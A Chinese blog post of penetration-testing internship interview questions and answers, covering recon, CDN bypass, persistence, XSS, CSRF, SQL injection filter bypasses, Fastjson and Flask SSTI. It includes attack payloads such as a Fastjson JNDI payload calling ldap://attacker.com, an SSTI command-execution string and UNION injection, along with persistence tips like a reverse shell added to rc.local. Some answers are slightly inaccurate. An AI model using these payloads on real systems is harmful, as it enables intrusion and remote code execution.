2025年渗透测试面试题总结-字某跳动-渗透测试实习生(题目+回答)

 网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

字某跳动-渗透测试实习生

渗透流程信息收集如何处理子域名爆破中的泛解析问题绕过CDN寻找真实IPPHPINFO页面关注信息有没有了解权限维持举例一个漏洞详细描述输出到href的xss如何防御samesite防御CSRF的原理CSRF的防御json格式的CSRF如何防御浏览器解析顺序和解码顺序过滤逗号的sql注入如何绕过过滤limit后的逗号如何绕过fastjson相关漏洞Python相关的漏洞回答(flask、SSTI原理)

1. 渗透流程

  1. 情报收集
    • 被动收集:Whois查询、证书透明度日志(CT Logs)、GitHub代码泄露。
    • 主动探测:子域名爆破(使用Amass/Sublist3r)、端口扫描(Masscan/Nmap)。
  2. 漏洞分析
    • 自动化扫描:AWVS/Nessus检测常见漏洞(SQLi/XSS)。
    • 手动验证:验证误报漏洞,如逻辑漏洞(越权/支付绕过)。
  3. 攻击利用
    • 漏洞利用:通过Metasploit或定制化EXP攻击目标(如ThinkPHP RCE)。
    • 权限提升:利用内核漏洞(DirtyCow)或SUID提权(find / -perm -4000)。
  4. 权限维持
    • 植入WebShell:加密后门(如蚁剑AES加密Shell)。
    • 系统后门:Windows注册表后门、Linux cronjob定时任务。
  5. 横向移动
    • 内网渗透:利用Responder抓取Net-NTLM哈希、Pass-The-Hash攻击。
    • 数据窃取:通过DNS隧道或HTTP隐蔽信道外传数据。

2. 子域名爆破中的泛解析问题处理

泛解析问题:所有未注册子域名解析到同一IP(如*.example.com → 1.1.1.1)。
解决方案

  1. 响应指纹去重
    • 对比HTTP响应头(Server/Cookie)和页面哈希(如SimHash)。
    • 使用工具(FFUF/GoBuster)的-mc参数过滤重复状态码。
  2. 证书透明度日志
    • 通过crt.sh 查询合法子域名证书记录。
  3. 历史DNS记录
    • 使用SecurityTrails/ViewDNS查询历史A记录。
  4. 字典智能生成
    • 基于目标业务关键词生成子域(如dev/api/test)。

3. 绕过CDN寻找真实IP的六种方法

  1. DNS历史记录:通过DNSDB查询目标域名历史解析IP。
  2. 全球Ping测试:多地服务器(AWS EC2/DigitalOcean)执行pingcurl
  3. SSL证书关联:Censys搜索相同证书的IP(parsed.names:example.com )。
  4. 敏感子域名:访问mail.example.cominternal.example.com 可能直连真实IP。
  5. 邮件服务器追踪:注册目标服务触发邮件,解析邮件头Received字段。
  6. SSRF漏洞利用:通过目标服务器的SSRF漏洞获取内网IP。

4. PHPINFO页面关键信息审计

  1. 敏感配置项
    • allow_url_fopen=On:允许远程文件包含(RFI)。
    • disable_functions:未禁用system/shell_exec等危险函数。
  2. 环境变量泄露
    • $_SERVER['DB_HOST']$_ENV['API_KEY']
  3. 临时文件路径
    • upload_tmp_dir可能暴露可写目录路径。
  4. 扩展模块风险
    • 启用imap扩展可能导致CVE-2018-19518漏洞。

5. 权限维持技术详解

  1. WebShell持久化
    • 隐藏文件名:.config.php + 修改文件时间戳(touch -t)。
  2. 系统级后门
    • Windows:注册表键HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon添加启动脚本。
    • Linux:/etc/rc.local 添加反向Shell命令。
  3. 内存驻留马
    • Java内存马:通过JSP注入Filter型内存Shell。
    • PHP内存马:利用php-fpm未授权访问注入。

6. 漏洞示例:SQL注入(以MySQL为例)

漏洞原理:未过滤用户输入的id参数直接拼接SQL语句。
利用Payload

/product?id=1' UNION SELECT 1,@@version,3-- -

攻击效果:泄露数据库版本、用户权限等敏感信息。
修复方案

  • 使用预编译语句(PDO/MyBatis)。
  • 输入过滤:正则匹配/[^0-9]/限制为数字。

7. 输出到href的XSS防御

漏洞示例:html

<a href="{{ user_input }}">Link</a> <!-- 用户输入为javascript:alert(1) -->

防御措施

  1. 协议白名单:仅允许http:///https:///mailto:
  2. URL编码:对href值进行HTML实体编码(如&&amp;)。
  3. CSP策略:设置Content-Security-Policy: default-src 'self'
  4. 框架安全:Vue/React自动转义href中的动态内容。

8. SameSite防御CSRF原理

  • SameSite=Strict:完全禁止跨站请求携带Cookie(如银行转账)。
  • SameSite=Lax:允许GET请求携带Cookie(适用于普通站点)。
  • SameSite=None:必须与Secure属性共用(仅限HTTPS)。

9. CSRF防御方案

  1. Token验证:表单中嵌入随机Token(如Django的{% csrf_token %})。
  2. 双重Cookie:请求头中携带Cookie哈希值(如X-CSRF-Token: hash(cookie))。
  3. Referer检查:验证请求来源域名是否在白名单内。

10. JSON格式CSRF防御

  1. Content-Type校验:拒绝非application/json请求。
  2. Token嵌入JSON:json
    { "data": "test", "csrf_token": "random_value" }
  3. 禁用CORS:设置Access-Control-Allow-Origin为特定域名。

11. 浏览器解析与解码顺序

  1. HTML解析优先
    • 解析标签和实体(如&lt;<)。
  2. JavaScript执行
    • 处理Unicode转义(如\u003c<)。
  3. URL解码
    • 转换%20为空格。
      示例:html
<a href="javascript:alert(1%26%23x29;)"></a> 

解码顺序:%26&&#x29;) → 最终执行alert(1)


12. 过滤逗号的SQL注入绕过

场景SELECT 1,2,3被拦截。
绕过方法

  1. JOIN语法:sql
    UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
  2. LIMIT OFFSET:sql
    UNION SELECT 1 FROM users LIMIT 1 OFFSET 1 

13. 过滤LIMIT逗号的绕过

场景LIMIT 0,1被拦截。
绕过方法

  1. SQL Server语法:sql
    SELECT TOP 1 * FROM users 
  2. 变量赋值(MySQL):sql
    SELECT * FROM users LIMIT 1 OFFSET 0 

14. Fastjson漏洞解析

漏洞根源:反序列化时自动调用getter/setter方法(如CVE-2022-25845)。
利用条件:目标开启autoType功能。
Payload示例:json

{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://attacker.com/exp" } 

修复方案:升级到Fastjson 1.2.83+,关闭autoType


15. Python漏洞:Flask SSTI

漏洞原理:未过滤用户输入直接渲染模板。
示例代码:python

@app.route('/hello/<name>') def hello(name): return render_template_string(f'Hello {name}!') 

攻击Payload:python

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

防御措施

  1. 使用安全模板引擎(Jinja2自动转义)。
  2. 输入过滤:禁止用户输入{{}}等特殊字符。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/71334.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Spring Boot 自动装配深度解析与实践指南

目录 引言&#xff1a;自动装配如何重塑Java应用开发&#xff1f; 一、自动装配核心机制 1.1 自动装配三大要素 1.2 自动装配流程 二、自定义自动配置实现 2.1 创建自动配置类 2.2 配置属性绑定 2.3 注册自动配置 三、条件注解深度应用 3.1 常用条件注解对比 3.2 自定…

《算法笔记》9.6小节 数据结构专题(2)并查集 问题 C: How Many Tables

题目描述 Today is Ignatius birthday. He invites a lot of friends. Now its dinner time. Ignatius wants to know how many tables he needs at least. You have to notice that not all the friends know each other, and all the friends do not want to stay with stra…

CPU、SOC、MPU、MCU--详细分析四者的区别

一、CPU 与SOC的区别 1.CPU 对于电脑&#xff0c;我们经常提到&#xff0c;处理器&#xff0c;内存&#xff0c;显卡&#xff0c;硬盘四大部分可以组成一个基本的电脑。其中的处理器——Central Processing Unit&#xff08;中央处理器&#xff09;。CPU是一台计算机的运算核…

Linux常用指令学习笔记

文章目录 前言一、文件和目录操作指令1. 文件操作2. 目录操作 二、文件权限管理三、网络相关指令四、系统管理指令五、文本编辑器基本操作 六、压缩和解压指令七、总结 前言 在当今的IT领域&#xff0c;Linux系统因其开源、稳定、安全等特性&#xff0c;广泛应用于服务器、个人…

android studio通过 jni 调用第三方非标准 so库

调用第三方的so方法&#xff0c;但这个so内的方法不是标准的jni方法。这就需要我们自己写jni然后链接到第三方so库&#xff0c;通过jni调用so库中的方法。 1.简述&#xff1a; 要先有第三方的so库.so文件和编译库对应的.h头文件 我们自己用 c/c 创建一个标准的so 库,比如 my…

Spring(三)容器-注入

一 自动注入Autowire 代码实现&#xff1a; package org.example.spring01.service;import org.springframework.stereotype.Service;Service public class UserService {}package org.example.spring01.controller;import lombok.Data; import lombok.ToString; import org.…

mac上最好的Python开发环境之Anaconda+Pycharm

为了运行修改 label-studio项目源码&#xff0c;又不想在windows上运行&#xff0c;便在mac上开始安装&#xff0c;开始使用poetry安装&#xff0c;各种报错&#xff0c;不是zip包解压不了&#xff0c;就是numpy编译报错&#xff0c;pipy.org访问出错。最后使用anaconda成功启动…

IDEA 接入 Deepseek

在本篇文章中&#xff0c;我们将详细介绍如何在 JetBrains IDEA 中使用 Continue 插件接入 DeepSeek&#xff0c;让你的 AI 编程助手更智能&#xff0c;提高开发效率。 一、前置准备 在开始之前&#xff0c;请确保你已经具备以下条件&#xff1a; 安装了 JetBrains IDEA&…

前缀和矩阵

前缀和矩阵&#xff08;Prefix Sum Matrix&#xff09;是一种预处理技术&#xff0c;用于快速计算二维矩阵中任意子矩阵的元素和。其核心思想是通过提前计算并存储每个位置左上角所有元素的和&#xff0c;将子矩阵和的查询时间从暴力计算的 (O(mn)) 优化到 (O(1))。以下是构建前…

系统架构评估中的重要概念

(1)敏感点(Sensitivity Point) 和权衡点 (Tradeoff Point)。敏感点和权衡点是关键的架构 决策。敏感点是一个或多个构件(和/或构件之间的关系)的特性。研究敏感点可使设计人员 或分析员明确在搞清楚如何实现质量目标时应注意什么。权衡点是影响多个质量属性的特性&#xff0c; …

SSL证书和HTTPS:全面解析它们的功能与重要性

每当我们在互联网上输入个人信息、进行在线交易时&#xff0c;背后是否有一个安全的保障&#xff1f;这时&#xff0c;SSL证书和HTTPS便扮演了至关重要的角色。本文将全面分析SSL证书和HTTPS的含义、功能、重要性以及它们在网络安全中的作用。 一、SSL证书的定义与基本概念 S…

基于微信小程序的停车场管理系统的设计与实现

第1章 绪论 1.1 课题背景 随着移动互联形式的不断发展&#xff0c;各行各业都在摸索移动互联对本行业的改变&#xff0c;不断的尝试开发出适合于本行业或者本公司的APP。但是这样一来用户的手机上就需要安装各种软件&#xff0c;但是APP作为一个只为某个公司服务的一个软件&a…

宝塔找不到php扩展swoole,服务器编译安装

1. 在php7.4中安装swoole&#xff0c;但找不到这个扩展安装 2. 服务器下载源码解压安装 http://pecl.php.net/package/swoole 下载4.8.0版本 解压到/www/server/php/74/下 3. 发现报错问题&#xff1b; 更新一下依赖 yum update yum -y install gcc gcc-c autoconf libjpe…

大数据测试总结

总结测试要点&#xff1a; 参考产品文档&#xff0c;技术文档梳理以下内容 需求来源 业务方应用场景 数据源&#xff0c;数据格转&#xff0c;数据产出&#xff0c;数据呈现方式&#xff08;数据消亡史&#xff09;&#xff0c;数据量级&#xff08;增量&#xff0c;全量&am…

React封装通用Table组件,支持搜索(多条件)、筛选、自动序号、数据量统计等功能。未采用二次封装调整灵活,包含使用文档

封装通用组件 一、封装思想二、react代码三、css代码四、实现效果五、使用文档 BasicTableModal 表格模态框组件1.组件简介2.功能特点3.使用方法基础用法宽度控制示例带筛选功能搜索功能示例自定义单元格渲染 4.API 说明PropsColumn 配置项Filter 配置项 5.注意事项 一、封装思…

React 中 useState 的 基础使用

概念&#xff1a;useState 是一个React Hook&#xff08;函数&#xff09;&#xff0c;它允许我们向组件添加状态变量&#xff0c;从而影响组件的渲染结果。 本质&#xff1a;和普通JS变量不同的是&#xff0c;状态变量一旦发生变化&#xff0c;组件的视图UI也会跟着变化&…

Html5学习教程,从入门到精通,HTML `<div>` 和 `<span>` 标签:语法知识点与案例代码(12)

HTML <div> 和 <span> 标签&#xff1a;语法知识点与案例代码 一、语法知识点 1. <div> 标签 定义: <div> 是一个块级元素&#xff0c;用于将文档内容划分为独立的、可样式化的部分。它本身没有特定的语义&#xff0c;主要用于布局和分组。特点: 块…

Hbase伪分布安装教程,详细版

注意Hbase版本与Hadoop版本的兼容&#xff0c;还有与JDK版本的兼容 本次用到的Hbase为2.4.6版本&#xff0c;Hadoop为3.1.3版本&#xff0c;JDK为JDK8 打开下面的网址查看兼容问题 Apache HBase Reference Guidehttps://hbase.apache.org/book.html#configuration 点击基础先…

Python项目】基于Python的图像去雾算法研究和系统实现

Python项目】基于Python的图像去雾算法研究和系统实现 技术简介&#xff1a;采用Python技术、MYSQL数据库等实现。 系统简介&#xff1a;图像去雾系统主要是基于暗通道先验和逆深度估计技术的去雾算法&#xff0c;系统功能模块分为&#xff08;1&#xff09;图像上传模块&…

Stable Diffusion Prompt编写规范详解

Stable Diffusion Prompt编写规范详解 一、语法结构规范 &#xff08;一&#xff09;基础模板框架 [质量强化] [主体特征] [环境氛围] [风格控制] [镜头参数]质量强化&#xff1a;best quality, ultra detailed, 8k resolution‌主体特征&#xff1a;(1girl:1.3), long …